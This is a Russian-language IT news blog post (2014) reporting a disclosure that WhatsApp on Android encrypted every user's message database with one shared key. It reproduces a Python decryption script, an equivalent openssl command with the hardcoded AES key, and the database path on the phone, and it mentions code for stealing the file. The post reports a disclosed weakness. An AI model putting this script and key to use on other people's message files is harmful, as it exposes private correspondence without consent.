IT News: Digital Camera, OS, Laptop, Smartphone, Smart TV, Sound...

The Author's Project by Valeri N.Kravchuk
Сайт проверен Dr.Web
Меню сайта
  • Главная страница
  • Информация о сайте
  • Дневник
  • Каталог файлов
  • Обратная связь
  • Каталог сайтов
  • FAQ
  • Доска объявлений
  • Форум
  • Фотоальбом
  • Категории раздела
    Измерительная техника, инструменты [278]
    Drones, boats, cars... [99]
    Накопители данных [186]
    Гаджеты для спорта и здоровья... [166]
    Автомобильные гаджеты... [159]
    Сети, сетевые технологии, оборудование... [211]
    Гаджеты, аксессуары... [604]
    News IT, Это интересно, ликбез... [1048]
    Linux и не только [4195]
    Windows 10... [271]
    Планшеты [738]
    Нетбуки, Ноутбуки, Ультрабуки [618]
    Смартфоны, фаблеты.. [4986]
    GPS-навигаторы, трекеры... [49]
    Видеорегистраторы [195]
    mini computers и не только... [365]
    Своими руками [322]
    CB, LPD, PMR- связь... [110]
    Smart TV, UltraHD, приставки, проекторы... [404]
    Радар-детекторы [22]
    DECT, IP-телефоны [18]
    Мультиварки, блендеры и не только... [122]
    Smart Watch [225]
    Блоки питания, Power Banks, зарядки... [340]
    Sound: наушники, плееры, усилители... [568]
    Безопасность IT [478]
    Электронные книги [75]
    Роботы-пылесосы [26]
    electric cars [28]
    Фотокамеры, объективы, искусство фотографии.. [433]
    Время

    Интересные ссылки

    COMPIZOMANIA

    Наш опрос
    Оцените мой сайт
    Всего ответов: 1243
    Статистика
    Анализ веб сайтов

    Яндекс.Метрика

    Рейтинг@Mail.ru Яндекс цитирования

    Russian America Top. Рейтинг ресурсов Русской Америки.

    eXTReMe Tracker

    Правильный CSS!


    Онлайн всего: 1
    Гостей: 1
    Пользователей: 0
    Locations of visitors to this page
    Форма входа
    Главная » 2014 » Март » 12 » Расшифровка и кража переписки WhatsApp на Android
    17:04
    Расшифровка и кража переписки WhatsApp на Android

    Расшифровка и кража переписки WhatsApp на Android

    Чувак по имени Bas Bosschert тупо замутил статью в своем блоге как украсть и расшифровать базу данных сообщений WhatsApp на Android абсолютно любого пользователя этого мессенджера одним ключом. ЛОООЛ. Т.е. для всех 100 000 000 млн. пользователей WhatsApp на Android пацаны из WhatsApp шифровали их частную переписку с помощью одного ключа. О том, что этот ключ знали все спецслужбы мира, начиная от КГБ и заканчивая ЦРУ это понятно. Но тот факт, что любой школьник который надыбал ключ мог спокойно воровать и открывать базы данных миллионов пользователей этого мессенджера, пугает. Получается разработчики настолько криворуки, что не могут (не хотят!) заботится о частной жизни пользователей.

     

    Расшифровка базы данных сообщений WhatsApp на Android

    База данных сообщений WhatsApp на Android выглядит как никий зашифрованный файл msgstore-2014-03-06.1.db.crypt Сам WhatsApp использует SQLite3 для хранения переписки и прочих данных. Найти базу данных в телефоне можно по пути: /WhatsApp/Databases/

    Выглядит это примерно так:
    Screenshot_2014-03-12-13-29-11

    В своем блоге Bas Bosschert приводит простой скрипт на Python который с помощью стандартного ключа с легкостью расшифрует вашу базу сообщений. Скрипт:

    #!/usr/bin/env python
     
    import sys
    from Crypto.Cipher import AES
     
    try:
        wafile=sys.argv[1]
    except:
        print "Usage: %s <msgstore .db.crypt>" % __file__
        sys.exit(1)
     
    key = "346a23652a46392b4d73257c67317e352e3372482177652c".decode('hex')
    cipher = AES.new(key,1)
    open('msgstore.db',"wb").write(cipher.decrypt(open(wafile,"rb").read()))</msgstore>

    Кто-то из пользователей предложил самый обычный вариант расшифровки, с использованием openssl:

    openssl aes-192-ecb -d -in msgstore.db.crypt -out msgstore.db \
    -K 346a23652a46392b4d73257c67317e352e3372482177652c

    Сам открытый ключ: 346a23652a46392b4d73257c67317e352e3372482177652c

    После выполнения скрипта получаем файл msgstore.db:
    AAAAAA

    Далее берем любую программу, которая умеет открывать файлы баз данных SQLite3 и смотрим содержимое:


    data

    Профит.
    Далее Bas Bosschert приводит код для Android с целью написания простой программки для кражи файла базы данных с телефона. К слову это совсем просто и любой программист для Android напишет такой кода за 10 минут.

    Безопасность

    Краеугольный камень современности — безопастность личных данных. Думаю самого такого понятия как приватные\личные данные уже не существует в современном цифромире. Хотя остались такие оплоты как Telegram.

    Ссылка на статью Bas Bosschert в его блоге.

     

    http://www.linuxspace.org/archives/5561

    Категория: Безопасность IT | Просмотров: 2409 | Добавил: laptop | Рейтинг: 5.0/2
    Всего комментариев: 0
    Добавлять комментарии могут только зарегистрированные пользователи.
    [ Регистрация | Вход ]
    Волк слабее льва и тигра, но в цирке волк не выступает!
    Волк слабее льва и тигра, но в цирке волк не выступает!
    Волк - единственный из зверей, который может пойти в бой на более сильного противника.
    Если же он проиграл бой, то до последнего вздоха смотрит в глаза противника. После этого умирает...

    Праздники сегодня

    Погода
    Погода в Нью-Йорке Погода в Бреcте
    Поиск
    Календарь
    Архив записей
    Друзья сайта
  • Официальный блог
  • JEEP - the best! Mercedes - the best! Автомобильный портал города Бреста: технические характеристики с фото, авторынок, автоспорт...
    Наша кнопка
    IT новости с моего лаптопа...

    Внимание!
    Администратор сайта laptop.ucoz.ru не несет ответственности за содержание рекламных объявлений. Все используемые на сайте зарегистрированные товарные знаки принадлежат своим законным владельцам! Используемая со сторонних источников информация публикуется с обязательными ссылками на эти источники.
    Copyright Valeri N.Kravchuk © 2007-2019